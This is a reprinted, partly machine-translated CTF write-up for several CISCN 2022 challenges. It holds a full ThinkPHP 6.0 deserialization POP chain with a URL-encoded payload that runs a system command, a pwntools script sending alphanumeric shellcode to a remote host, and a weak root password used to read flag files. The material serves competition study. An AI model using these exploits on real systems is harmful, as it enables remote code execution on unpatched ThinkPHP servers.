CISCN 2022 Partial Questions WP

Original link: https://5ime.cn/ciscn-2022.html

I feel that this year’s questions are simpler than last year’s, and the three passwords are unexpected. A good friend helped me with 150 multiple-choice questions, and then I got off the line after six CTF questions were asked~

Misc

Sign in to the station

First, according to the stem of the question, send keywords to the public account to get the hint

Open the question environment, find the password book, and then according to the official account prompt, 7*4 numbers are the first 28 digits

Click the pure number mode to take the first 28 bits

 1272685121234614783219665440

Then弼时安全到达了:

 1732 2514 1344 0356 0451 6671 0055

First get请求start the telegraph

 /send?msg=s

Then get请求the 28 digits after modulo ten

 /send?msg=2904836534674960728375375495

WEB

ezpop

tp6.0 , just search for an exp on Baidu (ThinkPHP6.0 deserialization chain audit and analysis: https://forum.butian.net/share/1168), we only need to find the deserialization point , after dirsearch scan, it is found that there is a www.zip file, and then there is a deserialization point in the index.php controller

 <?php namespace think { use think \ route \ Url ; abstract class Model    { private $lazySave ; private $exists ; protected $withEvent ; protected $table ; private $data ; private $force ; public function __construct ( )        { $this ->lazySave = true ; $this ->withEvent = false ; $this ->exists = true ; $this ->table = new Url (); $this ->force = true ; $this ->data = [ "1" ]; } }} namespace think \ model { use think \ Model ; class Pivot extends Model    { function __construct ( )        { parent :: __construct (); } } $b = new Pivot (); echo urlencode ( serialize ( $b ));} namespace think \ route { use think \ Middleware ; use think \ Validate ; class Url    { protected $url ; protected $domain ; protected $app ; protected $route ; public function __construct ( )        { $this ->url = 'a:' ; $this ->domain = "<?php system('cat /flag.txt');?>" ; $this ->app = new Middleware (); $this ->route = new Validate (); } }} namespace think { use think \ view \ driver \ Php ; class Validate    { public function __construct ( )        { $this ->type[ 'getDomainBind' ] = [ new Php (), 'display' ]; } } class Middleware    { public function __construct ( )        { $this ->request = "sp4c1ous" ; } }} namespace think \ view \ driver { class Php { public function __construct () { } }}

payload

 // ?s=index/test或者/index.php/index/testa=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A6%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A15%3A%22think%5Croute%5CUrl%22%3A4%3A%7Bs%3A6%3A%22%00%2A%00url%22%3Bs%3A2%3A%22a%3A%22%3Bs%3A9%3A%22%00%2A%00domain%22%3Bs%3A32%3A%22%3C%3Fphp+system%28%27cat+%2Fflag.txt%27%29%3B%3F%3E%22%3Bs%3A6%3A%22%00%2A%00app%22%3BO%3A16%3A%22think%5CMiddleware%22%3A1%3A%7Bs%3A7%3A%22request%22%3Bs%3A8%3A%22sp4c1ous%22%3B%7Ds%3A8%3A%22%00%2A%00route%22%3BO%3A14%3A%22think%5CValidate%22%3A1%3A%7Bs%3A4%3A%22type%22%3Ba%3A1%3A%7Bs%3A13%3A%22getDomainBind%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A21%3A%22think%5Cview%5Cdriver%5CPhp%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%22display%22%3B%7D%7D%7D%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7Ds%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3B%7D

password

Challenge code-based two-way authentication & challenge code-based two-way authentication 2

ssh connect directly to find the search flag

 find / -name 'flag*'
 cat /root/cube-shell/instance/flag_server/flag*

The first flag is基于挑战码的双向认证second one is基于挑战码的双向认证2

Two-way authentication based on challenge code3

Unexpected, account password: root:toor weak password

 cat /root/cube-shell/instance/flag_server/flag*

PWN

login-nomal

Navigate to main > sub_FFD()

It’s obviously an execution of sc .

 from pwn import *context.arch = 'amd64' context.log_level = 'debug' # p = process('./login') p = remote( '123.56.87.204' , 36979 )pl = "msg:ro0tt\nopt:1\n" p.sendlineafter( ">>" , pl)key = "Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a071N000" pl = "msg:" + key + "\nopt:2\n" p.sendlineafter( ">>" , pl)p.interactive()

This article is reprinted from: https://5ime.cn/ciscn-2022.html
This site is for inclusion only, and the copyright belongs to the original author.

Leave a Comment